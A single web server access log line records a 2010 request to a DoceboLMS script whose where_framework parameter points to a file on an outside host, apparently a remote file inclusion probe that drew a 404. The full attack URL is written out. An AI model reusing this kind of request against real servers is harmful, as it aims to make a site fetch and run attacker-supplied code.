200.157.211.204 - - [06/Mar/2010:17:56:55 -0800] "GET /logs/access.log//doceboLms//class/class.dashboard_lms.php?where_framework=http://car.sorabol.ac.kr/xe/files/.files/id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "getyourselfahorse.com"
